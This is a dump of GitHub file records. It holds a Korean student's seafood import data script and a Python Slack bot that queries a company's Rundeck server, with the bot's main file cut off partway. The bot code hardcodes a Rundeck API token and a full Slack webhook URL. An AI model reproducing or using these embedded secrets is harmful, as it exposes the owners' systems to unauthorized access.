print(\"Error\")\r\n sys.exit()\r\n\r\n#1-1. 사용자가 선택한 수산물 품목의 원산지 제공(출력)을 위한 리스트 정리\r\ndf2 = df.iloc[1773:,5] #origin.csv에서 원산지 추출\r\n\r\nmatrix3 = [] # 품목별 원산지를 저장할 리스트\r\nfor indata2 in df2:\r\n indata2 = indata2.replace(\"'\",\"\")\r\n #print(indata2)\r\n matrix3.append(indata2)\r\n#print(matrix3)\r\n\r\n#2. 사용자가 다양한 품목 중 하나를 입력.\r\nuser = input(\"품목입력 : \")\r\n\r\n#3. 입력받은 품목이 matrix2 리스트 안에 있으면 원산지 및 품질인증여부 출력\r\nif user in matrix2:\r\n print(user + \"의 원산지는 아래와 같습니다.\")\r\nelse:\r\n print()\r\n\r\nk = 0 # 리스트 matrix2 에서 품목별 위치를 저장하기 위해 만든 변수\r\nfor i in matrix2:\r\n if i == user:\r\n #print(k)\r\n if user in matrix2:\r\n print(matrix3[k]) # matrix3에서 k번째의 품목의 원산지 출력\r\n k = k + 1\r\n\r\n if user not in matrix2:\r\n print(\"해당 품목 없음.\")\r\n print(\"안녕히가세요\")\r\n sys.exit()\r\n break\r\nprint()\r\n\r\n# 품질인증여부 확인\r\ndd = pd.read_csv('inspection.csv')\r\n\r\ndd1 = dd.iloc[:,4] #품목\r\ndd2 = dd.iloc[:,7] #총수입건수\r\ndd3 = dd.iloc[:,10] #품질인증 부적합건수\r\n\r\nlist1 = [] #품목 종류를 저장할 리스트\r\nfor indata in dd1:\r\n indata = indata.replace(\"냉동\", \"\") #원활한 품목검색을 위하여 공통 글 공백화\r\n indata = indata.replace(\"냉장\", \"\")\r\n indata = indata.replace(\"활\", \"\")\r\n list1.append(indata)\r\n\r\nlist2 = [] #총수입건수 저장 리스트\r\nfor indata in dd2:\r\n list2.append(indata)\r\n\r\nlist3 = [] #부적합건수 저장 리스트\r\nfor indata in dd3:\r\n list3.append(indata)\r\n\r\ndict1 = dict(zip(list1, list2)) #딕셔너리화\r\ndict2 = dict(zip(list1, list3))\r\n\r\nif user in list1 :\r\n print(\"총 수입건수\" + str(dict1[user]))\r\n\r\n if dict2[user] != 0:\r\n print(\"품질인증 부적합건수\" + str(dict2[user]))\r\n print()\r\n else:\r\n print(\"품질인증 부적합건수 : 0\")\r\n print()\r\n\r\n#4. user가 원하면 관심있는 품목을 취급하는 위판장의 정보 제공\r\nuser_want = input(\"위판장의 정보를 제공받으시겠습니까? (Y or N)\").upper()\r\ndfff = pd.read_csv('sale.csv') #수입 수산물 위판장 정보 제공 공공데이터\r\n\r\ndfff1 = dfff.iloc[160:, 1] #위판장 정보 데이터에서 품목 종류, 160까지 같은 데이터라 시작점 160으로 설정.\r\n#print(dfff1)\r\ndfff2 = dfff.iloc[160:, 5] #위판장 정보 데이터에서 위판장 이름\r\n#print(dfff2)\r\n\r\nmatrix4 = [] # 품목 이름을 저장할 리스트\r\nfor indata3 in dfff1:\r\n indata3 = indata3.replace(\"'\",\"\")\r\n matrix4.append(indata3)\r\n#print(matrix4)\r\n\r\ndfff3 = dfff1 + dfff2 #품목 이름과 위판장 df를 합치기\r\n#print(dfff3)\r\nmatrix5 = [] # 품목 이름과 위판장을 저장할 리스트\r\nfor indata4 in dfff3:\r\n indata4 = indata4.replace(\"''\",\":\")\r\n indata4 = indata4.replace(\"'\",\"\")\r\n #print(indata4)\r\n matrix5.append(indata4)\r\n#print(matrix5)\r\nset_matrix5 = list(set(matrix5)) #중복되는 품목별 위판장을 제거\r\n#print(set_matrix5)\r\n\r\nif user_want == 'Y':\r\n print(\"-----위판장 정보-----\")\r\n if user in matrix4:\r\n for product in set_matrix5:\r\n product1 = product.split(\":\")\r\n if product1[0] == user:\r\n print(product1[1])\r\n else:\r\n print(\"위판정보없음.\")\r\n\r\nelse:\r\n print(\"안녕히가세요.\")"
},
{
"alpha_fraction": 0.5450182557106018,
"alphanum_fraction": 0.5911791324615479,
"avg_line_length": 23.59064292907715,
"blob_id": "1dbdf7f9b900cfb83d75d503accd8988009f4075",
"content_id": "7cced7510ba8d4f3392ec0d9b43ba2aaa50bc89c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6104,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 171,
"path": "/README.md",
"repo_name": "ayd0427/Final-HW",
"src_encoding": "UTF-8",
"text": "# 수입 수산물 품질인증 및 정보제공\r\n\r\n학과 | 학번 | 성명\r\n---- | ---- | ---- \r\n조선해양공학과 |201529154 |안용덕\r\n\r\n## 프로젝트 개발 동기\r\n후쿠시마 수산물 수입규제 문제로 WTO에서 승소판정을 받은 사례에서 국민들도 수입 수산물의 안정성을 알 필요가 있다고 생각하여 진행하게 되었음.\r\n\r\n\r\n## 프로젝트 개요\r\n1. 우리나라로 수입되는 수산물 품목의 종류를 제공(출력) - 여기서 사용자가 상세한 품목을 볼지 간단히 나타낸 품목을 볼지 선택할 수 있음.\r\n2. 사용자가 다양한 품목 중 하나를 입력.\r\n3. 입력된 품목의 원산지와 품질인증 여부를 출력.\r\n4. 사용자가 원하면 수산물 위판장의 목록을 나열.\r\n\r\n## 사용한 공공데이터 \r\n1.[데이터보기1](https://github.com/ayd0427/Final-HW/blob/master/inspection.csv)\r\n2.[데이터보기2](https://github.com/ayd0427/Final-HW/blob/master/origin.csv)\r\n3.[데이터보기3](https://github.com/ayd0427/Final-HW/blob/master/sale.zip)\r\n\r\n## 소스\r\n* [링크로 소스 내용 보기](https://github.com/ayd0427/Final-HW/blob/master/201529154_%EC%95%88%EC%9A%A9%EB%8D%95_%EA%B8%B0%EB%A7%90%EA%B3%BC%EC%A0%9C.py) \r\n\r\n* 코드 삽입\r\n~~~python\r\nimport pandas as pd\r\nimport sys #프로그램 종료를 위해 import\r\n\r\ndf = pd.read_csv('origin.csv') #수입 원산지 제공 공공데이터\r\n\r\n#1. 수입되는 수산물 품목의 종류를 제공(출력)\r\ndf1 = df.iloc[1773:,7] #origin.csv에서 종류 추출, 1773이 수입 처음\r\n#print(df1) #품목들 출력\r\n\r\nmatrix = [] # 상세한 품목 종류를 저장할 리스트\r\nfor indata in df1:\r\n indata = indata.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n matrix.append(indata) #변환된 목록들을 리스트로 추가\r\n\r\nmatrix2 = [] # 간단한 품목 종류를 저장할 리스트\r\nfor indata1 in df1:\r\n indata1 = indata1.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n indata1 = indata1.split(\"(\") # ( 를 기준으로 리스트형식으로 분리 후\r\n del(indata1[1:]) # 뒤에 내용 삭제\r\n indata1 = indata1.pop() #리스트 안에 리스트를 넣게되어서 그전에 값만 추출\r\n #print(indata1)\r\n matrix2.append(indata1)\r\n\r\nuser_num = input(\"품목종류(번호입력) : 1. 상세히 2. 간단히\")\r\n\r\nif user_num == '1' :\r\n print(matrix) #리스트화 된 상세한 목록들 출력\r\n print()\r\nelif user_num == '2':\r\n print(matrix2) #리스트화 된 간단한 목록들 출력\r\n print()\r\nelse :\r\n print(\"Error\")\r\n sys.exit()\r\n\r\n#1-1. 사용자가 선택한 수산물 품목의 원산지 제공(출력)을 위한 리스트 정리\r\ndf2 = df.iloc[1773:,5] #origin.csv에서 원산지 추출\r\n\r\nmatrix3 = [] # 품목별 원산지를 저장할 리스트\r\nfor indata2 in df2:\r\n indata2 = indata2.replace(\"'\",\"\")\r\n #print(indata2)\r\n matrix3.append(indata2)\r\n#print(matrix3)\r\n\r\n#2. 사용자가 다양한 품목 중 하나를 입력.\r\nuser = input(\"품목입력 : \")\r\n\r\n#3. 입력받은 품목이 matrix2 리스트 안에 있으면 원산지 및 품질인증여부 출력\r\nif user in matrix2:\r\n print(user + \"의 원산지는 아래와 같습니다.\")\r\nelse:\r\n print()\r\n\r\nk = 0 # 리스트 matrix2 에서 품목별 위치를 저장하기 위해 만든 변수\r\nfor i in matrix2:\r\n if i == user:\r\n #print(k)\r\n if user in matrix2:\r\n print(matrix3[k]) # matrix3에서 k번째의 품목의 원산지 출력\r\n k = k + 1\r\n\r\n if user not in matrix2:\r\n print(\"해당 품목 없음.\")\r\n print(\"안녕히가세요\")\r\n sys.exit()\r\n break\r\nprint()\r\n\r\n# 품질인증여부 확인\r\ndd = pd.read_csv('inspection.csv')\r\n\r\ndd1 = dd.iloc[:,4] #품목\r\ndd2 = dd.iloc[:,7] #총수입건수\r\ndd3 = dd.iloc[:,10] #품질인증 부적합건수\r\n\r\nlist1 = [] #품목 종류를 저장할 리스트\r\nfor indata in dd1:\r\n indata = indata.replace(\"냉동\", \"\") #원활한 품목검색을 위하여 공통 글 공백화\r\n indata = indata.replace(\"냉장\", \"\")\r\n indata = indata.replace(\"활\", \"\")\r\n list1.append(indata)\r\n\r\nlist2 = [] #총수입건수 저장 리스트\r\nfor indata in dd2:\r\n list2.append(indata)\r\n\r\nlist3 = [] #부적합건수 저장 리스트\r\nfor indata in dd3:\r\n list3.append(indata)\r\n\r\ndict1 = dict(zip(list1, list2)) #딕셔너리화\r\ndict2 = dict(zip(list1, list3))\r\n\r\nif user in list1 :\r\n print(\"총 수입건수\" + str(dict1[user]))\r\n\r\n if dict2[user] != 0:\r\n print(\"품질인증 부적합건수\" + str(dict2[user]))\r\n print()\r\n else:\r\n print(\"품질인증 부적합건수 : 0\")\r\n print()\r\n\r\n#4. user가 원하면 관심있는 품목을 취급하는 위판장의 정보 제공\r\nuser_want = input(\"위판장의 정보를 제공받으시겠습니까? (Y or N)\").upper()\r\ndfff = pd.read_csv('sale.csv') #수입 수산물 위판장 정보 제공 공공데이터\r\n\r\ndfff1 = dfff.iloc[160:, 1] #위판장 정보 데이터에서 품목 종류, 160까지 같은 데이터라 시작점 160으로 설정.\r\n#print(dfff1)\r\ndfff2 = dfff.iloc[160:, 5] #위판장 정보 데이터에서 위판장 이름\r\n#print(dfff2)\r\n\r\nmatrix4 = [] # 품목 이름을 저장할 리스트\r\nfor indata3 in dfff1:\r\n indata3 = indata3.replace(\"'\",\"\")\r\n matrix4.append(indata3)\r\n#print(matrix4)\r\n\r\ndfff3 = dfff1 + dfff2 #품목 이름과 위판장 df를 합치기\r\n#print(dfff3)\r\nmatrix5 = [] # 품목 이름과 위판장을 저장할 리스트\r\nfor indata4 in dfff3:\r\n indata4 = indata4.replace(\"''\",\":\")\r\n indata4 = indata4.replace(\"'\",\"\")\r\n #print(indata4)\r\n matrix5.append(indata4)\r\n#print(matrix5)\r\nset_matrix5 = list(set(matrix5)) #중복되는 품목별 위판장을 제거\r\n#print(set_matrix5)\r\n\r\nif user_want == 'Y':\r\n print(\"-----위판장 정보-----\")\r\n if user in matrix4:\r\n for product in set_matrix5:\r\n product1 = product.split(\":\")\r\n if product1[0] == user:\r\n print(product1[1])\r\n else:\r\n print(\"위판정보없음.\")\r\n\r\nelse:\r\n print(\"안녕히가세요.\")\r\n\r\n~~~\r\n"
}
] | 2 |
Elygian/slackdeckbot
|
https://github.com/Elygian/slackdeckbot
|
43518ca4364540f1fe37a8355d8650e12d6a0908
|
1f0ef35ae454cfff52493c0e3d0d33460548cb6c
|
c2e80f753c8bfe86e33b00b9bb357804ae8a2ff6
|
refs/heads/master
| 2019-06-16T17:38:33.505738 | 2017-08-21T12:01:22 | 2017-08-21T12:01:22 | 99,248,619 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 17.33333396911621,
"blob_id": "dd322cd6125752db059039b94eab57fc3a842d8c",
"content_id": "d5e65278f7239cffcdfa1e368fc3afcd07d2fa81",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "Elygian/slackdeckbot",
"src_encoding": "UTF-8",
"text": "slackclient==1.0.6\nrequests==2.18.3\nTimeConvert==1.4.1\n"
},
{
"alpha_fraction": 0.4704505503177643,
"alphanum_fraction": 0.47965317964553833,
"avg_line_length": 43.442081451416016,
"blob_id": "c513d513d9988e1bb4aa84b5142a2b6f42a65b7b",
"content_id": "46480715f47c861c5039592cb3ac348179076c87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18799,
"license_type": "permissive",
"max_line_length": 630,
"num_lines": 423,
"path": "/mainTesting.py",
"repo_name": "Elygian/slackdeckbot",
"src_encoding": "UTF-8",
"text": "# from slackclient import SlackClient\n# from rundeck.client import Rundeck\n# from xml.dom import minidom, Node\n# from TimeConvert import TimeConvert as tc\n# from datetime import datetime\n# import time\n# import requests\n# import os\n# import sys\n# import json\n# import xml.etree.ElementTree as ET\n# import re\n#\n# try:\n# # You need to create 2 environment variables called SLACKBOT_MESSAGEBOT_TOKEN RUNDECK_API_TOKEN and with the correct values, which can be found on the teams slack channel settings\n# token = os.environ.get('SLACKBOT_MESSAGEBOT_TOKEN')\n# apitoken = os.environ.get('RUNDECK_API_TOKEN')\n#\n# #Instantiate the slack api object\n# slack_client = SlackClient(token)\n#\n# #Instantiate the rundeck api object\n# rd = Rundeck('rundeck.bsigroup.com',\n# api_token=apitoken, protocol='https', port='4443')\n#\n# #This is the link to the \"that would be great\" piture. Can be removed if you want, make sure to remove the relevant statement in the commands section!\n# link = '<https://cdn.meme.am/instances/400x/33568413.jpg|That would be great>'\n#\n# #Connect to the real time messaging API\n# slack_client.rtm_connect()\n#\n# resources = rd.list_project_resources('IPP')\n#\n# while True:\n#\n# def list_jobs():\n# jobs = rd.list_jobs('IPP')\n#\n# for job in jobs:\n# del job['project']\n# #del job['id']\n# del job['href']\n# del job['permalink']\n# del job['group']\n# del job['description']\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# attachments = []\n# payload = {}\n#\n# for job in jobs:\n# attachment = {}\n# if isinstance(job, dict):\n# attachment[\"title\"] = job[\"name\"]\n# attachment[\"fallback\"] = \"\"\n# attachments.append(attachment)\n#\n# payload[\"text\"] = \"Rundeck Job List\"\n# payload[\"attachments\"] = attachments\n#\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# def list_nodes():\n# #Create a variable with a list of the jobs on the rundeck project\n# jobs = rd.list_jobs('IPP')\n#\n# #Create a variable with a list of nodes available to the IPP rundeck project\n# resources = rd.list_project_resources('IPP')\n#\n# nodes = []\n# for key in resources.keys():\n# nodes.append(key)\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# attachments = []\n# payload = {}\n#\n# for node in nodes:\n# attachment = {}\n# attachment[\"title\"] = str(node)\n# attachment[\"fallback\"] = \"\"\n# attachment[\"color\"] = \"#27651a\"\n# attachments.append(attachment)\n#\n# payload[\"text\"] = \"Available Nodes on Rundeck\"\n# payload[\"attachments\"] = attachments\n#\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# def job_output():\n# job_output = vars(rd.api.execution(text[11:]))\n#\n# job_xml_file = open(\"jobXML.xml\", \"w\")\n# job_xml_file.write(str(job_output[\"body\"]))\n# job_xml_file.close()\n#\n# jobOutputXML = minidom.parse('jobXML.xml')\n#\n# job_name = jobOutputXML.getElementsByTagName('name')\n# job_description_list = jobOutputXML.getElementsByTagName('description')\n#\n# if job_description_list.length <= 2:\n# job_desc = \"No Description\"\n# elif job_description_list.length > 2:\n# job_desc = job_description_list[0].firstChild.nodeValue\n#\n# time_started_var = jobOutputXML.getElementsByTagName('date-started')\n# time_finished_var = jobOutputXML.getElementsByTagName('date-ended')\n# job_start_time = time_started_var[0].firstChild.nodeValue\n# job_end_time = time_finished_var[0].firstChild.nodeValue\n#\n# for ch in ['T', 'Z']:\n# if ch in job_start_time:\n# job_start_time = job_start_time.replace(ch, ' ')\n#\n# for ch in ['T', 'Z']:\n# if ch in job_end_time:\n# job_end_time = job_end_time.replace(ch, ' ')\n#\n# payload = {}\n#\n# attachments = [{\"color\": \"#0043c4\", \"title\": job_name[0].firstChild.nodeValue, \"text\": job_desc}, {\n# \"color\": \"#0043c4\", \"title\": \"Started: \" + job_start_time, \"text\": \"Finished: \" + job_end_time}]\n#\n# failed_nodes_obj = jobOutputXML.getElementsByTagName(\"failedNodes\")\n#\n# payload[\"attachments\"] = attachments\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n# os.remove(\"jobXML.xml\")\n#\n# def rundeckstatus():\n# system_information = vars(rd.api.system_info())\n# sysinfo_xml_file = open(\"sysinfoXML.xml\", \"w\")\n# sysinfo_xml_file.write(str(system_information[\"body\"]))\n# sysinfo_xml_file.close()\n# systemInfoXML = minidom.parse('sysinfoXML.xml')\n# rundeck_version_info = systemInfoXML.getElementsByTagName('message')\n# ETXML = ET.parse('sysinfoXML.xml')\n# for value in ETXML.getiterator(tag='uptime'):\n# uptime = value.attrib['duration']\n# hours = int(int(uptime) / (60 * 60 * 1000))\n# for value in ETXML.getiterator(tag='loadAverage'):\n# cpu_usage_element = ET.tostring(value).decode('utf-8')\n# cpu_usage = re.findall('\\d+\\.\\d+', cpu_usage_element)\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Rundeck Info :nerd_face: :\" + \"`\" + str(rundeck_version_info[0].firstChild.nodeValue)[16:] + \"`\\n\" + \"Uptime :alarm_clock: : \" + \"`\" + str(\n# hours) + \" hours`\\n\" + \"CPU Usage :desktop_computer: : \" + \"`\" + str(cpu_usage[0]) + \"%\" + \"`\\n\",\n# as_user='true:'\n# )\n# os.remove('sysinfoXML.xml')\n#\n# def executions():\n# webhook_url = 'https://hooks.slack.com/services/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'\n# attachments = []\n# payload = {}\n# execution_output = vars(rd.api.executions('IPP'))\n# executionInfoXML = open(\"executionInfoXML.xml\", \"w\")\n# executionInfoXML.write(str(execution_output[\"body\"]))\n# executionInfoXML.close()\n# executionsXML = ET.parse('executionInfoXML.xml')\n# for value in executionsXML.getiterator(tag='execution'):\n# attachment = {}\n# if isinstance(value.attrib, dict):\n# attachment[\"title\"] = value.attrib[\"id\"]\n# attachment[\"title_link\"] = value.attrib[\"href\"]\n# attachment[\"text\"] = value.attrib[\"status\"]\n# attachment[\"fallback\"] = \"\"\n# if value.attrib[\"status\"] == \"succeeded\":\n# attachment[\"color\"] = \"#0dff00\"\n# else:\n# attachment[\"color\"] = \"#ff0000\"\n# attachments.append(attachment)\n# payload[\"text\"] = \"Todays rundeck jobs so far :clipboard:\"\n# payload[\"attachments\"] = attachments\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n# os.remove('executionInfoXML.xml')\n#\n# def runjobrdp():\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Running Get RDP Sessions job, this could take up to 2 minutes, please wait until the results message comes back before using any other commands\",\n# as_user='true:'\n# )\n#\n# time.sleep(0.5)\n# job_object = rd.run_job('488abbce-d06c-4111-a2d3-3d8ae0a393d4',\n# argString={'from': 'Rundeck Slack Bot'}, timeout=120)\n#\n# time.sleep(0.5)\n# job_results = rd.get_execution_output(job_object[\"id\"])\n#\n# message_colour = \"#00ff39\"\n# if job_object[\"status\"] != \"succeeded\":\n# message_colour = \"#ff0000\"\n# elif job_object[\"status\"] == \"running\":\n# message_colour = \"#ffbf00\"\n#\n# payload = {\n# \"attachments\": [\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"RDP Rundeck Job Page\",\n# \"text\": \"Link to the page for the job that was run\",\n# \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n# },\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"RDP Rundeck Job Results Page\",\n# \"text\": \"Permalink to the results of this specific job execution\",\n# \"title_link\": \"%s\" % job_object[\"href\"]\n# }\n# ]\n# }\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# time.sleep(0.5)\n# job_results = rd.get_execution_output(job_object[\"id\"])\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Users with active RDP sessions are:\",\n# as_user='true:'\n# )\n#\n# rdp_users_text = \"\"\n#\n# for result in job_results[\"entries\"]:\n# if isinstance(result, dict):\n# if \"|\" in result[\"log\"]:\n# rdp_users_text += result[\"log\"].split(\"|\", 1)[1] + \",\"\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=rdp_users_text,\n# as_user='true:'\n# )\n#\n# def runjobsiteversions(resources):\n#\n# nodes = []\n# for key in resources.keys():\n# nodes.append(key)\n#\n# if text[21:] not in nodes:\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"That server doesn't exist :face_with_rolling_eyes: Did you make a typo?\",\n# as_user='true:'\n# )\n# else:\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Running Get Site Versions job, please wait until the results message comes back before using any other commands\",\n# as_user='true:'\n# )\n#\n# time.sleep(0.5)\n# job_object = rd.run_job('242f3848-20fa-4ff9-8014-9acb45a6a7c5',\n# argString={'from': 'Rundeck Slack Bot'}, timeout=120, name=text[21:])\n#\n# message_colour = \"#00ff39\"\n# if job_object[\"status\"] != \"succeeded\":\n# message_colour = \"#ff0000\"\n# elif job_object[\"status\"] == \"running\":\n# message_colour = \"#ffbf00\"\n#\n# payload = {\n# \"attachments\": [\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"Site Versions Rundeck Job Page\",\n# \"text\": \"Link to the page for the job that was run\",\n# \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n# },\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"Site Versions Rundeck Job Results Page\",\n# \"text\": \"Permalink to the results of this specific job execution\",\n# \"title_link\": \"%s\" % job_object[\"href\"]\n# }\n# ]\n# }\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# time.sleep(0.5)\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Getting site versions. Give me a minute :thinking_face:\",\n# as_user='true:'\n# )\n#\n#\n# version_list_data = rd.get_execution_output(job_object[\"id\"])\n#\n# site_version_list = version_list_data[\"entries\"]\n#\n# log_key_list = []\n# final_list = {}\n# for result in site_version_list:\n# log_key_list.append(result[\"log\"])\n#\n# payload = {}\n# attachments = []\n# for site_result in log_key_list:\n# r = []\n# x = re.split(\"\\s*([d|D]:\\\\\\\\.*)\", site_result)\n# if len(x) >= 3:\n# del x[1]\n# del x[1]\n# y = x[0].split()\n# if len(y) == 2:\n# site_name = y[0]\n# site_version = y[1]\n# final_list[str(site_name)] = str(site_version)\n# if \"host\" in site_name:\n# host_name = site_version\n# if \"env\" in site_name:\n# env_name = site_version\n# if \"host\" not in site_name or \"env\" not in site_name:\n# attachment = {}\n# attachment[\"color\"] = \"#ff0073\"\n# attachment[\"title\"] = site_name\n# attachment[\"text\"] = site_version\n# attachments.append(attachment)\n#\n# payload[\"text\"] = \"Site Versions: [{}] on [{}]\".format(env_name, host_name)\n# payload[\"attachments\"] = attachments\n#\n#\n# response = requests.post(webhook_url, data=json.dumps(payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (response.status_code, response.text))\n#\n# events = slack_client.rtm_read()\n# for event in events:\n# if (\n# 'channel' in event and\n# 'text' in event and\n# event.get('type') == 'message'\n# ):\n# channel = event['channel']\n# text = event['text']\n#\n# if text == \"!help\":\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"\"\"slackdeckBot Command List:\\n`!listjobs` - This shows a list of jobs currently in the IPP Rundeck project.\\n`!runjob:rdp` - This will run the 'Show RDP Sessions' Rundeck job and return links to the results page.\\n`!executions` - This is a WIP, it will generate an XML file with information about recently executed jobs and save it to the bot's working directory.\\n`!joboutput:[execution_id_number]` - This takes an execution job number and returns the name of the job and the date/time it was started and when it finished\\n`!rundeckstatus` - Gives some information about rundecks current state\"\"\",\n# as_user='true:'\n# )\n#\n# if 'that would be great' in text.lower() and link not in text:\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=link,\n# as_user='true:'\n# )\n#\n# if '!listjobs' in text.lower() and \"Command List\" not in text:\n# list_jobs()\n#\n# if text == ('!runjob:rdp') and \"Command List\" not in text:\n# runjobrdp()\n#\n# if text.startswith('!runjob:siteversions:') and \"Command List\" not in text:\n# runjobsiteversions(resources)\n#\n# # TODO Parse XML into JSON object to send to Slack\n# if text.startswith(\"!executions\") and \"Command List\" not in text:\n# executions()\n#\n# if text.startswith('!rundeckstatus'):\n# rundeckstatus()\n#\n# if text.startswith(\"!joboutput:\") and \"Command List\" not in text:\n# job_output()\n#\n# if text == (\"!listnodes\"):\n# list_nodes(resources)\n#\n# except Exception as e:\n# print(e)\n"
},
{
"alpha_fraction": 0.5923504829406738,
"alphanum_fraction": 0.6015220880508423,
"avg_line_length": 40.74745559692383,
"blob_id": "96e72dc5e76e4b5c95077196320f169b10101687",
"content_id": "48763817bb500c0423576969d111c8e3d4aaa978",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20498,
"license_type": "permissive",
"max_line_length": 632,
"num_lines": 491,
"path": "/main.py",
"repo_name": "Elygian/slackdeckbot",
"src_encoding": "UTF-8",
"text": "from slackclient import SlackClient\nfrom rundeck.client import Rundeck\nfrom xml.dom import minidom, Node\nfrom TimeConvert import TimeConvert as tc\nfrom datetime import datetime\nimport time\nimport requests\nimport os\nimport sys\nimport json\nimport xml.etree.ElementTree as ET\nimport re\n\n# You need to create 2 environment variables called SLACKBOT_MESSAGEBOT_TOKEN RUNDECK_API_TOKEN and with the correct values, which can be found on the teams slack channel settings\ntoken = os.environ.get('SLACKBOT_MESSAGEBOT_TOKEN')\napitoken = os.environ.get('RUNDECK_API_TOKEN')\n\n#Instantiate the slack api object\nslack_client = SlackClient(token)\n\n#Instantiate the rundeck api object\nrd = Rundeck('rundeck.bsigroup.com',\n api_token='D5lsXIHwBuk5lMKxYa4VMeua4D1JHK4l', protocol='https', port='4443')\n\n#This is the link to the \"that would be great\" piture. Can be removed if you want, make sure to remove the relevant statement in the commands section!\nlink = '<https://cdn.meme.am/instances/400x/33568413.jpg | That would be great>'\n\n#Create a variable with a list of nodes available to the IPP rundeck project\nresources = rd.list_project_resources('IPP')\n\ndef list_jobs():\n #A list of all the jobs on the IPP rundeck project\n jobs = rd.list_jobs('IPP')\n\n #Iterate through the jobs variable and delete anything not relevant to the job name\n for job in jobs:\n del job['project']\n del job['href']\n del job['permalink']\n del job['group']\n del job['description']\n\n #Set the webhook url TODO variablise this\n webhook_url = 'URL HERE'\n\n #Initialise an empty 'attachments' list and 'payload' dictionary for sending attachments to the slack chat\n attachments = []\n payload = {}\n\n #Build an attachment to send to the chat and populate it with job names\n for job in jobs:\n attachment = {}\n if isinstance(job, dict):\n attachment[\"title\"] = job[\"name\"]\n attachment[\"fallback\"] = \"\"\n attachments.append(attachment)\n\n #Carry on building attachment with title text\n payload[\"text\"] = \"Rundeck Job List\"\n payload[\"attachments\"] = attachments\n\n #jsonify the attachments and send them to the webhook created earlier\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\ndef list_nodes(resources):\n #A list of all the jobs on the IPP rundeck project\n jobs = rd.list_jobs('IPP')\n\n #Empty list of nodes, to which nodes are appended with a for-in loop\n nodes = []\n for key in resources.keys():\n nodes.append(key)\n\n #Same webhoook from earlier TODO variablise this\n webhook_url = 'URL HERE'\n attachments = []\n payload = {}\n\n #Same approach as in list_jobs function, different attachment content. This time with COLOUR!\n for node in nodes:\n attachment = {}\n attachment[\"title\"] = str(node)\n attachment[\"fallback\"] = \"\"\n attachment[\"color\"] = \"#27651a\"\n attachments.append(attachment)\n\n payload[\"text\"] = \"Available Nodes on Rundeck\"\n payload[\"attachments\"] = attachments\n\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\ndef job_output():\n #Get the execution output of a job by slicing the message and taking the execution ID and passing it to the api\n job_output = vars(rd.api.execution(text[11:]))\n\n #Write the job output to an XML file (yaaay XML!) and save it to the dir of the bot.\n job_xml_file = open(\"jobXML.xml\", \"w\")\n job_xml_file.write(str(job_output[\"body\"]))\n job_xml_file.close()\n\n #Parse the XMLwith minidom and assign it to a variable\n jobOutputXML = minidom.parse('jobXML.xml')\n\n #Iterate through job output XML and assign the job name and job description to variables\n job_name = 